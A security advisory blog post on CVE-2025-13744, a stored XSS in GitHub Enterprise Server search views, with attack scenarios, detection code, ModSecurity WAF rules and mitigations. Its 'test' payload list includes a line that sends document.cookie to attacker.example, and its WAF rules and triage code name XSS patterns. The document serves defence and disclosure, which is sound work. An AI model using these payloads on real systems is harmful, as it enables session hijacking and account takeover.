CVE-2025-13744: Stored XSS in Search & Filter Views Enables Session Hijack and Admin Compromise

CVE-2025-13744

Vulnerability Type: Cross-Site Scripting (XSS)
Category: Web Application – Stored XSS
CVSS Score: 8.4
Severity: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Impact: Session hijacking, privilege escalation, data exposure, administrative compromise
Exploit Availability: No publicly released exploit at the time of disclosure, but exploitation is straightforward
Exploitability: High
Affected Systems: GitHub Enterprise Server (multiple versions prior to patch)


Overview

CVE-2025-13744 is a stored cross-site scripting (XSS) vulnerability affecting GitHub Enterprise Server. The flaw exists in how certain user-controlled fields are processed and later rendered within search and filter interfaces. Input supplied by users is not consistently sanitized or safely encoded before being displayed, allowing malicious HTML or JavaScript to execute in the browsers of other users.

This vulnerability is particularly dangerous because the injected payload is stored persistently and may be executed multiple times whenever affected content appears in search results, filters, dashboards, or administrative views.

Because these interfaces are commonly accessed by maintainers and administrators, the vulnerability can be leveraged to compromise high-privilege accounts.


How the Vulnerability Works

  1. A user creates or modifies an object such as:
    • Issue title
    • Pull request title or description
    • Milestone name
    • Repository metadata
    • Any searchable text field rendered by filter/search views
  2. The attacker embeds malicious HTML or JavaScript into the field.
  3. The application stores the value without sufficiently neutralizing dangerous content.
  4. When another user performs a search or views a filtered list that includes this object, the application renders the stored value directly into the page.
  5. The victim’s browser executes the malicious script under the application’s trusted origin.
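To make the render-time defect in steps 3 to 5 concrete, here is an added example in JavaScript (not code from GitHub Enterprise Server or from this advisory): a minimal search-result renderer in its vulnerable and corrected forms, plus the kind of automated injection check recommended under long-term remediation. The result shape, function names and probe strings are assumptions for illustration.

```javascript
// Added example (not GitHub's or this advisory's code): a minimal search-result
// renderer showing the defect class behind CVE-2025-13744 and its fix. The
// result shape and function names are assumptions for illustration.

// Constructed sample of stored objects as a search/filter view receives them;
// record 2 carries a stored payload of the kind shown later on this page.
const storedResults = [
  { id: 1, title: "Fix login timeout" },
  { id: 2, title: "<img src=x onerror=alert(1)>" },
];

// VULNERABLE: the stored title is interpolated straight into markup, so any
// tag in it becomes part of the page and runs under the application's origin.
function renderResultsUnsafe(results) {
  return results.map((r) => `<li data-id="${r.id}">${r.title}</li>`).join("");
}

// Output encoding for HTML text and double-quoted attribute contexts: every
// character that can change the parser's state is replaced by an entity.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// FIXED: encoding happens at render time, for every user-controlled value,
// regardless of what was (or was not) sanitized when the object was stored.
function renderResultsSafe(results) {
  return results
    .map((r) => `<li data-id="${escapeHtml(r.id)}">${escapeHtml(r.title)}</li>`)
    .join("");
}

// Automated injection check for CI: render each inert probe through the given
// renderer and return the probes that survive as raw markup. An empty list means
// the renderer encodes its output; a non-empty list is a regression.
const injectionProbes = [
  "<script>probe</script>",
  "<svg onload=probe>",
  "<img src=x onerror=probe>",
  '"><b>probe</b>',
];
function findUnencodedProbes(renderFn) {
  return injectionProbes.filter((p) => renderFn([{ id: 0, title: p }]).includes(p));
}

console.log("unsafe renderer leaks:", findUnencodedProbes(renderResultsUnsafe));
console.log("safe renderer leaks:", findUnencodedProbes(renderResultsSafe));
```

The check deliberately targets the renderer rather than the storage layer: input-side sanitization can be bypassed or skipped by another code path, whereas encoding at the point of output holds for every value that reaches the view, which is the consistency the overview says was missing.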

Realistic Attack Scenarios

Scenario 1 – Session Hijacking

An attacker injects a payload that steals session cookies or authentication tokens. When an administrator views a search result, their active session is silently exfiltrated, allowing the attacker to impersonate them.

Scenario 2 – Privileged Actions

Injected JavaScript performs authenticated actions such as:

  • Creating new users
  • Modifying repositories
  • Changing access controls
  • Adding SSH keys or access tokens

All actions execute using the victim’s permissions.

Scenario 3 – Internal Data Exfiltration

The script reads sensitive data exposed in the DOM, API responses, or page variables and sends it to an external server.

Scenario 4 – Lateral Movement

Once an admin account is compromised, the attacker can pivot across repositories and teams within the enterprise instance.


Why This Vulnerability Is High Risk

  • Stored XSS executes repeatedly and silently
  • Search and filter views have broad visibility
  • Administrative users are likely victims
  • No advanced exploitation skills are required
  • Exploitation can bypass CSRF protections
  • Impacts confidentiality, integrity, and availability

MITRE Mapping

CWE:

  • CWE-79 – Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting)

MITRE ATT&CK Techniques:

  • T1189 – Drive-by Compromise
  • T1059.007 – Command and Scripting Interpreter: JavaScript
  • T1078 – Valid Accounts (post-exploitation)

Detection Strategy

Log Sources to Monitor

  • GitHub Enterprise audit logs
  • Application logs for create/update actions
  • API request logs
  • Web server access logs
  • WAF or reverse proxy logs
  • SIEM correlation events

Indicators of Suspicious Activity

  • Object names containing HTML tags
  • JavaScript keywords in titles or descriptions
  • Repeated create/update events followed by admin UI access
  • Outbound network connections triggered by UI views
  • Unusual repository or milestone renames
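The indicators above can be turned into a first-pass triage over exported audit events. The following is an added example in JavaScript (not GitHub's or this advisory's code); the event fields (ts, actor, action, field, value, path) and the sample lines are a constructed, hypothetical simplification of a SIEM export, and the patterns are heuristics rather than an HTML parser.

```javascript
// Added example (not GitHub's or this advisory's code): triage of audit-log
// events against the indicators listed above. The event fields (ts, actor,
// action, field, value, path) are a hypothetical simplification of a SIEM export.

// Constructed sample, one JSON event per line.
const auditLogLines = [
  '{"ts":"2025-11-20T09:00:01Z","actor":"dev-a","action":"issues.create","field":"title","value":"Fix login timeout"}',
  '{"ts":"2025-11-20T09:00:07Z","actor":"dev-b","action":"issues.update","field":"title","value":"<svg onload=alert(1)>"}',
  '{"ts":"2025-11-20T09:00:09Z","actor":"dev-b","action":"milestone.rename","field":"name","value":"Q4 javascript:void(0)"}',
  '{"ts":"2025-11-20T09:01:00Z","actor":"admin-1","action":"admin.ui.view","path":"/search?q=is:open"}',
  '{"ts":"2025-11-20T09:02:00Z","actor":"dev-c","action":"repo.create","field":"description","value":"Uses <3 emoji"}',
];

// Indicator patterns. HTML_TAG requires a letter after "<" so "<3" is not a tag;
// JS_KEYWORD covers the URL scheme, inline handlers and common sinks. These are
// triage heuristics for analysts, not a parser, so expect some benign hits.
const HTML_TAG = /<\s*\/?[a-z][\w-]*[\s>\/]/i;
const JS_KEYWORD = /(javascript\s*:|\bon[a-z]+\s*=|document\.cookie|\beval\s*\()/i;

function classifyValue(value) {
  const indicators = [];
  if (HTML_TAG.test(value)) indicators.push("html_tag");
  if (JS_KEYWORD.test(value)) indicators.push("js_keyword");
  return indicators;
}

// Flags create/update events whose written value carries an indicator, then
// correlates each one with administrative UI views that follow within windowMs
// (the "create/update followed by admin UI access" pattern from the list above).
function triageAuditLog(lines, windowMs = 5 * 60 * 1000) {
  const events = lines.map((line) => JSON.parse(line));
  const adminViews = events.filter((e) => e.action === "admin.ui.view");
  const findings = [];
  for (const e of events) {
    if (typeof e.value !== "string") continue;
    const indicators = classifyValue(e.value);
    if (indicators.length === 0) continue;
    const t0 = Date.parse(e.ts);
    const adminViewsAfter = adminViews
      .filter((v) => Date.parse(v.ts) >= t0 && Date.parse(v.ts) - t0 <= windowMs)
      .map((v) => `${v.actor} ${v.ts} ${v.path}`);
    findings.push({ ts: e.ts, actor: e.actor, action: e.action, field: e.field, indicators, adminViewsAfter });
  }
  return findings;
}

for (const f of triageAuditLog(auditLogLines)) console.log(JSON.stringify(f));
```

The correlation window is the useful part for prioritisation: a flagged write that an administrator's search view followed within minutes is the exact sequence the attack scenarios describe and deserves a session and token review before the content is merely cleaned up.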

Example XSS Payloads (For Testing Only)

<script>alert(1)</script>
<svg onload=alert('xss')>
<img src=x onerror=fetch('https://attacker.example/'+document.cookie)>

These payloads are representative and should only be used in test or staging environments.


WAF Protection Rules

Rule Group 1 – Block Script Tags (High Confidence)

# All groups assume SecRequestBodyAccess On; without it REQUEST_BODY is empty
# for write requests. ARGS holds url-decoded parameter values, REQUEST_BODY the
# raw body, so each pattern is tested against both views of the data.
SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374401,phase:2,block,log,msg:'Stored XSS attempt: script tag detected',severity:CRITICAL,chain"
# Chained rule: only evaluated when the method matched above; @rx is the default operator.
SecRule ARGS|REQUEST_BODY "(?i)<\s*script\b"

Rule Group 2 – Block JavaScript Protocol Injection

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374402,phase:2,block,log,msg:'Stored XSS attempt: javascript protocol usage',severity:CRITICAL,chain"
# Catches javascript: in href/src style values; whitespace between scheme and colon is tolerated.
SecRule ARGS|REQUEST_BODY "(?i)javascript\s*:"

Rule Group 3 – Block Inline Event Handlers

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374403,phase:2,block,log,msg:'Stored XSS attempt: inline event handler detected',severity:HIGH,chain"
# Fixed list of handler names; extend it as needed, but note that a value such as
# "reason=" does not match because the name must start at "on".
SecRule ARGS|REQUEST_BODY "(?i)on(load|error|click|mouseover|focus|submit)\s*="

Rule Group 4 – Block SVG-Based Execution

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374404,phase:2,block,log,msg:'Stored XSS attempt: SVG execution vector',severity:HIGH,chain"
SecRule ARGS|REQUEST_BODY "(?i)<\s*svg\b"

Rule Group 5 – Obfuscation & Encoding Detection

SecRule REQUEST_METHOD "@rx ^(POST|PUT|PATCH)$" \
"id:1374405,phase:2,block,log,msg:'Stored XSS attempt: encoded or obfuscated payload',severity:MEDIUM,chain"
# Highest false-positive risk of the set: %22 and %27 occur in any url-encoded
# form body that contains a quote or apostrophe, and &#...; in legitimate HTML
# entities. Run this group with pass instead of block until its hit rate on
# ordinary content is understood.
SecRule ARGS|REQUEST_BODY "(?i)(&#x?[0-9a-f]+;|%3c|%3e|%22|%27)"
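Before any of these groups go into blocking mode it is worth knowing which of them fire on the page's own test payloads and which fire on ordinary input. The following is an added example in JavaScript (not the blog's, ModSecurity's or any vendor's code) that ports the five patterns verbatim, models the ARGS|REQUEST_BODY split between decoded parameters and the raw body, and runs both against constructed request bodies. The bodies are constructed samples; the rule ids are the ones used above.

```javascript
// Added example (not the blog's, ModSecurity's or any vendor's code): the five
// patterns from the rule groups above ported to JavaScript and exercised against
// the test payloads from this page and against benign form input, so coverage
// and false positives are known before the rules go into blocking mode.

const wafPatterns = {
  1374401: /<\s*script\b/i,                                    // Rule Group 1
  1374402: /javascript\s*:/i,                                  // Rule Group 2
  1374403: /on(load|error|click|mouseover|focus|submit)\s*=/i, // Rule Group 3
  1374404: /<\s*svg\b/i,                                       // Rule Group 4
  1374405: /(&#x?[0-9a-f]+;|%3c|%3e|%22|%27)/i,                // Rule Group 5
};

function matchingRules(text) {
  return Object.entries(wafPatterns)
    .filter(([, re]) => re.test(text))
    .map(([id]) => Number(id));
}

// Models ARGS|REQUEST_BODY: REQUEST_BODY is the raw (still url-encoded) body,
// while ARGS holds each parameter value after url-decoding. A rule fires if its
// pattern matches either view of the data.
function evaluateRequest(rawBody) {
  const hits = new Set(matchingRules(rawBody));
  for (const pair of rawBody.split("&")) {
    const eq = pair.indexOf("=");
    const encoded = eq < 0 ? "" : pair.slice(eq + 1);
    const decoded = decodeURIComponent(encoded.replace(/\+/g, " "));
    for (const id of matchingRules(decoded)) hits.add(id);
  }
  return [...hits].sort((a, b) => a - b);
}

// Constructed bodies: the first two url-encode payloads from this page's test
// list; the rest are ordinary titles a developer might submit.
const maliciousBodies = [
  "title=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
  "title=%3Csvg+onload%3Dalert(%27xss%27)%3E",
];
const benignBodies = [
  "title=Don%27t+break+the+build",
  "title=Onboarding+checklist",
  "description=Copyright+%C2%A9+2025",
];

// Rules that fire on at least one benign body: candidates for detect-only
// (pass instead of block) or a tighter pattern before enforcement.
function rulesFiringOnBenign(bodies) {
  const ids = new Set();
  for (const b of bodies) for (const id of evaluateRequest(b)) ids.add(id);
  return [...ids].sort((a, b) => a - b);
}

// Malicious bodies that no rule catches: coverage gaps.
function uncaughtBodies(bodies) {
  return bodies.filter((b) => evaluateRequest(b).length === 0);
}

console.log("benign false positives:", rulesFiringOnBenign(benignBodies));
console.log("uncaught payloads:", uncaughtBodies(maliciousBodies));
```

On these samples Group 5 is the only rule that fires on benign input (an apostrophe in a form-encoded title is enough), while Groups 1, 3 and 4 are what actually catch the decoded payloads; that split supports keeping Group 5 in detect-only mode and the others in blocking mode.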

Recommended Temporary Mitigations (If Patch Cannot Be Applied Immediately)

  • Restrict who can create or rename issues, milestones, and repositories
  • Enforce MFA for all maintainers and administrators
  • Limit access to search/filter views to trusted networks
  • Deploy the WAF rules above in blocking mode
  • Audit existing content for injected HTML or scripts
  • Rotate sessions and tokens if suspicious activity is found

Long-Term Remediation

  • Apply the official vendor patch
  • Enforce output encoding at render time
  • Sanitize all user-controlled fields
  • Add automated tests for HTML/script injection
  • Monitor create/update events for suspicious patterns

Official Patch

GitHub Enterprise Server Security Release Notes:
https://docs.github.com/en/enterprise-server@latest/admin/release-notes


Final Note

CVE-2025-13744 is a classic example of how stored XSS in shared UI components can escalate quickly into a full administrative compromise. While WAF rules provide meaningful protection, they should be treated as temporary safeguards. The definitive fix is applying the vendor patch and ensuring consistent output encoding across all rendered content.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.